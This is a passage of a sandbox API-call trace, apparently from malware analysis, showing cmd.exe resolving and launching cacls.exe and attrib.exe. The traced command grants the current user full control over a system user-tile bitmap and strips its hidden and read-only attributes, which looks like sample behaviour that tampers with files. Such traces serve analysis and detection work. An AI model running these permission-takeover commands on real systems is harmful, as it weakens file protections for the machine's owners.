lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x40, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x40, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegCloseKey (hKey=0x40) returned 0x0 [0187.940] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e784 | out: phkResult=0x26e784*=0x40) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x40, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x1, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x1, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x0, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x9, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x9, lpcbData=0x26e788*=0x4) returned 0x0 [0187.941] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x9, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.941] RegCloseKey (hKey=0x40) returned 0x0 [0187.941] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886396 [0187.941] srand (_Seed=0x5b886396) [0187.941] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"" [0187.941] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"" [0187.941] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.941] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0187.941] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.941] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.942] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.942] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0187.942] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0187.942] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0187.942] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0187.942] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0187.942] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0187.942] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0187.942] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0187.942] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0187.942] GetEnvironmentStringsW () returned 0x2d2458* [0187.943] FreeEnvironmentStringsW (penv=0x2d2458) returned 1 [0187.943] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.943] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.943] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0187.943] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0187.943] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0187.943] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0187.943] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0187.943] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0187.943] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0187.943] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0187.943] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f550 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.943] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f550, lpFilePart=0x26f54c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f54c*="Desktop") returned 0x18 [0187.943] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.943] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f2cc | out: lpFindFileData=0x26f2cc) returned 0x2d0ae8 [0187.944] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0187.944] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f2cc | out: lpFindFileData=0x26f2cc) returned 0x2d0ae8 [0187.944] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0187.944] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f2cc | out: lpFindFileData=0x26f2cc) returned 0x2d0ae8 [0187.944] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0187.944] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.944] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0187.944] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0187.944] GetEnvironmentStringsW () returned 0x2d0308* [0187.945] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0187.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.945] GetConsoleOutputCP () returned 0x1b5 [0187.945] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.945] GetUserDefaultLCID () returned 0x409 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f690, cchData=128 | out: lpLCData="0") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f690, cchData=128 | out: lpLCData="0") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f690, cchData=128 | out: lpLCData="1") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0187.946] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0187.947] GetConsoleTitleW (in: lpConsoleTitle=0x2c09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.948] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.948] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0187.948] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0187.948] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0187.949] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0187.949] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0187.949] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0187.949] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0187.949] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0187.949] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0187.950] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0187.950] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0187.952] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0187.952] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0187.952] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0187.952] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0187.952] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0187.952] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0187.952] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0187.955] GetConsoleTitleW (in: lpConsoleTitle=0x26f324, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.955] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.955] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.955] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.955] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.955] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.955] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.955] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.955] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.955] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.955] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.955] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.955] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.955] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.955] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.955] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.955] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.955] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.955] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.955] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.955] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.955] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.956] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.956] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.956] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.956] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.956] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.956] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.956] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.956] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.956] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.956] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.956] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.956] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.956] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.956] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.956] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.956] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.956] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.956] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.956] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.956] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.956] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.956] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.956] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.956] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.956] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.956] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.956] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.956] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.956] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.956] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.956] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.956] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.956] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.956] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.956] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.957] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.957] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.957] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.957] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.957] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.957] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.957] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.957] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.957] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.957] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.957] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.957] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.957] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.957] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.957] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.957] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.957] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.957] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.957] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0187.957] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0187.957] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0187.957] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0187.957] SetErrorMode (uMode=0x0) returned 0x0 [0187.957] SetErrorMode (uMode=0x1) returned 0x0 [0187.957] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2d1e98, lpFilePart=0x26ee44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ee44*="Desktop") returned 0x18 [0187.957] SetErrorMode (uMode=0x0) returned 0x1 [0187.958] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.958] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.978] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.979] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0187.979] GetLastError () returned 0x2 [0187.979] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0187.979] GetLastError () returned 0x2 [0187.979] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0x2d2180 [0187.979] FindClose (in: hFindFile=0x2d2180 | out: hFindFile=0x2d2180) returned 1 [0187.979] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0187.979] GetLastError () returned 0x2 [0187.980] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0x2d2180 [0187.980] FindClose (in: hFindFile=0x2d2180 | out: hFindFile=0x2d2180) returned 1 [0187.980] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.980] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.980] GetConsoleTitleW (in: lpConsoleTitle=0x26f0b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.980] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef40, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f008 | out: lpAttributeList=0x26ef40, lpSize=0x26f008) returned 1 [0187.980] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef40, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f000, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef40, lpPreviousValue=0x0) returned 1 [0187.980] GetStartupInfoW (in: lpStartupInfo=0x26eefc | out: lpStartupInfo=0x26eefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.980] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.981] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ef9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x26efe8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x8d0, dwThreadId=0x868)) returned 1 [0187.983] CloseHandle (hObject=0x4c) returned 1 [0187.983] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.983] GetEnvironmentStringsW () returned 0x2d0308* [0187.983] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0187.983] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0188.020] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26eedc | out: lpExitCode=0x26eedc*=0x0) returned 1 [0188.020] CloseHandle (hObject=0x50) returned 1 [0188.020] _vsnwprintf (in: _Buffer=0x26f024, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eee8 | out: _Buffer="00000000") returned 8 [0188.020] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.020] GetEnvironmentStringsW () returned 0x2d2410* [0188.020] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.020] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.020] GetEnvironmentStringsW () returned 0x2d2410* [0188.020] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.020] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef40 | out: lpAttributeList=0x26ef40) [0188.020] GetConsoleTitleW (in: lpConsoleTitle=0x26f324, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.021] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.021] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.021] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.021] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0188.021] GetLastError () returned 0x2 [0188.021] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0188.021] GetLastError () returned 0x2 [0188.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0x2ce4d8 [0188.021] FindClose (in: hFindFile=0x2ce4d8 | out: hFindFile=0x2ce4d8) returned 1 [0188.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0188.022] GetLastError () returned 0x2 [0188.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0x2ce4d8 [0188.022] FindClose (in: hFindFile=0x2ce4d8 | out: hFindFile=0x2ce4d8) returned 1 [0188.022] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.022] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.022] GetConsoleTitleW (in: lpConsoleTitle=0x26f0b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.022] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef40, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f008 | out: lpAttributeList=0x26ef40, lpSize=0x26f008) returned 1 [0188.022] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef40, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f000, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef40, lpPreviousValue=0x0) returned 1 [0188.022] GetStartupInfoW (in: lpStartupInfo=0x26eefc | out: lpStartupInfo=0x26eefc*(cb=0x44, lpReserved="", 